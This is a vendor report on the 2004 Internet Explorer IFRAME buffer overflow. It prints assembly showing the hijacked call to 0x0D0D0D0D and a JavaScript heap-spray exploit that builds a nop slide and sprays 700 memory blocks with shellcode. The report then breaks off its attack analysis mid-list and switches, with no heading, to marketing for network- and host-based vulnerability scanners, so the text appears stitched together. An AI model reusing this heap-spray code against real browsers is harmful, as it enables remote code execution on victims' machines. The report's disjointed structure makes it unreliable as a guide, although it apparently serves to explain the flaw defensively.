The Key Report of Network Attack- How to decode and prevent IE Iframe

Computer Emergency Response Team (CERT) of America on November 5, 2004 announced IE Iframe and Frame vulnerability and warned the related units at all levels of America to take strict precautions against this vulnerability. Recently, internet worm MyDoom started to attack IE Iframe from all side. DragonSoft Vulnerability Audit Team that offers a theorem analysis of this vulnerability and a plan of losing risk transiently help users decline risk.

IE Iframe Buffer Overflow Analysis:
  • Iframe vulnerability analysis
    Iframe and Frame are both HTML tags of Internet Explorer for constructing frameset in document. The vulnerability is caused due to a boundary error in the handling of certain attributes in the <IFRAME> HTML tags. A remote attacker could create a long string in the "SRC" and "Name" attributes of the <IFRAME> tag Web Page. An attacker could exploit this vulnerability by malicious Web page or by sending it to victim as an HTML email.
    
               The BoF sets eax to 0x0D0D0D0D after which this code gets executed:
               7178EC02                      8B08            MOV     ECX, DWORD PTR [EAX]
               [0x0D0D0D0D] == 0x0D0D0D0D, so ecx = 0x0D0D0D0D.
               7178EC04                      68 847B7071     PUSH    71707B84
               7178EC09                      50              PUSH    EAX
               7178EC0A                      FF11            CALL    NEAR DWORD PTR [ECX]
               Again [0x0D0D0D0D] == 0x0D0D0D0D, so we jump to 0x0D0D0D0D.
                   
               
  • Iframe Vulnerability Attacking Analysis
    (1) Using script Shell code

    <SCRIPT language="javascript"> shellcode = unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u89eb"); // Nopslide will contain these bytes: bigblock = unescape("%u0D0D%u0D0D"); // Heap blocks in IE have 20 dwords as header headersize = 20; // This is all very 1337 code to create a nopslide that will fit exactly // between the the header and the shellcode in the heap blocks we want. // The heap blocks are 0x40000 dwords big, I can't be arsed to write good // documentation for this. slackspace = headersize+shellcode.length while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0x40000) block = block+block+fillblock; // And now we can create the heap blocks, we'll create 700 of them to spray // enough memory to be sure enough that we've got one at 0x0D0D0D0D memory = new Array(); for (i=0;i<700;i++) memory[i] = block + shellcode; </SCRIPT>
    The network-based vulnerability assessment do audit through network. It has five main functions:
    1. network discovery could scan every equipment and host on network and find out the unknown or unauthorized equipment or host.
    2. it could scan which service is working on network and examine what ports are opened.
    3. it could find out vulnerability and exposure quickly.
    4. it provides the references of vulnerability to assist technical managers to patch their systems.
    5. it could produce examining complete reports and provide security and risk information for enterprise efficiently.

    Notes:

    1. most firewalls will resist ports and then these firewalls will affect the result of examination.
    2. some of the Windows vulnerabilities require Registry access to determine. Please supply a proper credential to the VA tool you used.


    Advantages: its advantages include the deployment centralized management and doing industrial vulnerability assessment easily.
    Disadvantage: its disadvantage includes the examination authorized of the targets.

  • Host-based
    In the host-based vulnerability assessment tool, the scanner is set on the inspected host, and it has completely authority to access more privilege to examine the host but the network could only inspect from outside through the network. It has three main functions:
    1. It could examine the incorrect set for file authority on the host.
    2. It could examine the improper setting of the software. (For example, password is too simple.)
    3. The unauthorized installation of software. For example, an employee may install some kind of remote control or VPN software on her/his workstation.

    The managers could consider installing network vulnerability assessment in more important server or host; they could examine the vulnerability of high risk and install patch program. The managers' purpose is that give the users of company a comfortable and safe network environment.


    Its advantage: it has more scanning methods and it could scan more vulnerability.
    Its disadvantage: it is hard to centralized management.
Behind the Vulnerability Assessment- Vulnerability Database
No matter to the Network-based or Host-based vulnerability assessments, both need the latest vulnerability database. With this database, it could gather different vulnerability information for examination to find out vulnerability and exposures quickly. Moreover, with latest vulnerability database any time, it could be sure that the result of examination is the most correct.

DragonSoft Provides the Solution
From the beginning, DragonSoft is devoted to the researcher and development of vulnerability assessment for network security. In order to provide the complete solutions, we supply the Network-based and Host-based Vulnerability Assessment for IT managers to choose. Both have its advantages and disadvantages. Customers could use both to make up the shortage of each one to offer the enterprise the most complete risk assessment.

DragonSoft Provides the Solution : It belongs to the Network Vulnerability Assessment. It could examine vulnerabilities of the network service and provide intact risk assessment for IT managers to examine the enterprises completely and conduct the next improvement plans.

DragonSoft System Security Manager(DSSM): It belongs to the Server Vulnerability Assessment. At present, it could inspect the security of the system, search vulnerabilities, check IDs and passwords, and provide related patch to be downloaded toward the server. The program could download the programs and be patched directly. In the further versions, t a centralized control center program will be added to ease the vulnerability management process.

Related Websites
DragonSoft Secure Scanner (introduce our products)
About DragonSoft Security Associates, Inc.
DragonSoft Security Associates is a leading developer in Taiwan for network security software and an active contributor to network security education. Founded in 2002, DragonSoft offers vulnerability management olutions, including vulnerability assessment, System Security Management and intrusion prevention.